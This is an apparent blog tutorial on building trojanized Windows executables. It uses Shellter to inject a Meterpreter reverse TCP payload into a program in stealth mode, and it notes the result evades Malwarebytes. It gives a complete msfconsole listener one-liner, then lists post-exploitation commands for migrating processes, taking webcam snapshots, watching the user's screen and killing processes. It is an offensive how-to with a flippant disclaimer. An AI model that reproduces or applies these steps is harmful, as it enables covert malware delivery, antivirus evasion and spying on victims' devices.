Shellter & Meterpreter
Ooh a storm is threatening
Hello all. Let’s make some malware.
You heard me, we’re gonna make malware today.
Let’s go!
Now that I have your attention. Today we’re going to be talking about Shellter. Shellter is a shellcode injection tool. It takes an executable and manipulates it to execute desired code. So, yes, it makes malware.
Shellter is dynamic. Each injection is unique. It is inspired Entry Point Obscuring (EPO) viruses.
What you will need.
Metasploit installed (preferably on Linux)
Wine (if running strictly from Linux,
sudo apt install wine32)A WINDOWS executable file (can be anything you download from the internet, countdown.exe from my Tor site under ‘programs’ will do nicely)
Shellter installed (On either OS)
Your Windows AV turned off (unless you’re running Malwarebytes 😱)
First things first, launch Shellter.
A for automatic mode.
Next, Shellter will ask for a PE target, you will then provide the path to the executable that you are trying to inject. I ran this through WSL, so I had to provide a pretty funky path.
Next, Shellter will try to run the executable to deduce a good position by tracing through instructions and picking a random one. This will take about a minute.
Shellter will then ask if you want to do Stealth Mode. Stealth mode means that the executable will run as normal, and anyone who runs the .exe will notice no changes in it. If stealth mode is shut off, then the executable will not run when attempted to be executed (aka LOUD malware). If you select stealth mode, your payload can die when the .exe finishes execution. Otherwise, if you don’t, you won’t have that issue.
I’m going to go with Yes.
After selecting Stealth Mode, you are prompted with payloads. Payloads are the malicious code that is injected into the .exe. We’ll go with Meterpreter Reverse TCP. The cool thing about Shellter is that you can write and inject your own, custom payloads!
Enter L. Then 1.
Next is LHOST aka “Listening Host”. Unless you plan on sicking this malware on your friends, keep it localhost (127.0.0.1).
Then LPORT aka “Listening Port”. Pick a random port (I picked 4545).
If you did it right, you should see Injection: Verified!
Press Enter, and voilà! You have malware on your machine.
For fun, let’s toss the malware into VirusTotal. Here is my copy, but yours will be different, obviously. Yes, it gets caught by a bunch of anti-virus tools, but look closely…
Malwarebytes is one of the most commonly used free anti-virus programs, and it doesn’t catch this easily-made malware.
Let’s look back at the payload we selected. We went with Meterpreter Reverse TCP. This is what is called a “reverse shell”. In a typical shell session, a user asks for a shell from a remote server (think SSH). However, in a reverse shell session, the server opens a shell and asks a client for the connection.
We already set up the LHOST and LPORT. Now we need a shell listener on our client (attacker) machine.
Metasploit will get us our Meterpreter session. Quick one-liner for this is:
sudo msfconsole -x "use multi/handler; set payload windows/meterpreter/reverse_tcp; set LHOST 127.0.0.1; set LPORT 4545; exploit"Now you have a reverse shell listener on your attacker machine.
All you need to do now is run the .exe!
Now you have a Meterpreter session open.
Meterpreter
Meterpreter is a shell on steroids. If you want a glimpse at what you can accomplish, just enter ‘?’.
Since your session will die if the .exe finishes, you should migrate to another process that won’t die anytime soon. ps to list processes, and migrate to migrate to the process you want.
Here are some fun commands you can try:
kill <pid>- Kill a process by its IDwebcam_snap– Take a webcam photo and download itscreenshare– Watch user’s screen in real timeshutdown– Shut down the ‘sploited machineshell– If you have a CD drive, run first, thenpowershell (New-Object -com "WMPlayer.OCX.7").cdromcollection.item(0).eject()
Within Meterpreter, you can even run Metasploit post exploitation tools. The sky’s the limit!
This should be obvious, but please don’t do anything illegal with what I’ve mentioned above. I am not responsible if you get caught. If you do get caught, I will make fun of you. Publicly.
Go!
-BowTiedCrawfish